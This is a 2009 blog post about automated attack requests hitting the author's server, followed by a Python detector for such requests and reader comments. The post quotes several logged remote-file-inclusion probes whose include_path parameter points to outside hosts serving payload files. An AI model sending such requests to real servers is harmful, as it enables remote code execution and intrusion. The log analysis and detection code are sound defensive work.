Nov 23, 2009

Let's do something stupid!

Let's try some stupid HTTP requests to my server :) For example, this:

GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close

or

GET /article/advanced-guestbook-spam-blockin…//admin.php?include_path=http://www.vnmhost.net/01.gif? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

or

GET /article//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

or

GET /article/advanced-guestbook-spam-blocking.html//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1
Connection: close
Host: dmitry-dulepov.com
User-Agent: Mozilla/5.0

I see requests like this daily in the security logs of both my servers. They are all stopped by mod_security.
I wonder, am I the only one who gets tons of this scum? :) If anybody else monitors his/her server security, you are welcome to share your "statistics" about these automated attacks on non-existing web applications.
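
For anyone who wants to produce such "statistics" from their own logs: the requests above all carry an absolute URL as the value of a query parameter. The sketch below is an added example, not part of the original post and not a mod_security rule; it flags that pattern in request lines and counts hits per parameter and remote host. The function names and the benign sample line are made up for the illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Complete request lines from the post, plus one benign line constructed for contrast.
SAMPLE_REQUEST_LINES = [
    "GET /article//admin.php?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1",
    "GET /article/advanced-guestbook-spam-blocking.html//admin.php"
    "?include_path=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1",
    "GET /article/advanced-guestbook-spam-blocking.html?ref=home HTTP/1.1",  # constructed
]

# A parameter value that is itself an absolute URL is the signal these probes share.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def classify(request_line):
    """Return details of the first query parameter carrying a remote URL, or None."""
    fields = request_line.split(" ")
    if len(fields) != 3:
        return None  # malformed request line: not this detector's job
    target = fields[1]
    # Split by hand: a target starting with "//" would confuse urlsplit().
    path, _, query = target.partition("?")
    # parse_qsl percent-decodes, so an encoded "http%3A%2F%2F..." is caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):
            return {
                "path": path,
                "param": name,
                "host": urlsplit(value.strip()).hostname,
            }
    return None


def summarize(request_lines):
    """Count flagged requests per (parameter, remote host) pair."""
    hits = Counter()
    for line in request_lines:
        finding = classify(line)
        if finding:
            hits[(finding["param"], finding["host"])] += 1
    return hits


if __name__ == "__main__":
    for (param, host), count in summarize(SAMPLE_REQUEST_LINES).most_common():
        print(f"{count:4d}  {param}  {host}")
```

Legitimate parameters that carry URLs (redirect targets, for example) will also match, so the counts are a starting point for triage, not a verdict.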

9 comments:

  1. See them all the time. None of them get through, so I just ignore them.

  2. Same here. Just ignore the noise.

  3. I once tried to set up mod_security2 for a Typo3 installation... I didn't manage to do it in the time frame I deemed appropriate... It blocked away stuff like the standard tt_news "click-to-enlarge".

    Are there any Typo3-mod_security tutorials around or maybe even a ruleset maintained by the t3sec team or something like that?

  4. Chris, no, nothing like that around. Security is a very special topic...

    Dan & Steffen, they do not bother me much except that I always wonder at the stupidity of such attacks. They not only waste my resources, they also waste their own. It looks like some beginner hacker attempts.

  5. I think most of them are simply brute-force attacks that try various known security hole exploits - without first checking the target system and _then_ applying some exploits to it.

  6. Same here, a lot of noise with these requests. However, I have had 2 servers hacked with the success of such commands.

    One was a phpmyadmin exploit which gave the attacker shell access from a forged HTTP request. Another had been exploiting a hole in phpnuke and allowed the download and execution of a remote shell.

    Almost every piece of software has security holes, so solutions like mod_security are required to block such HTTP requests before they reach any hole. It's too bad mod_security is so difficult to configure though...

  7. I think that this blog is dying, unfortunately...

  8. Tomasz, it does not :) I simply do not have enough time and motivation to write on TYPO3 topics. I have lots of other stuff to write about but I doubt it will be interesting to existing visitors :(

  9. I hope this blog doesn't die, as I've read some of the most brilliant posts about TYPO3 here.
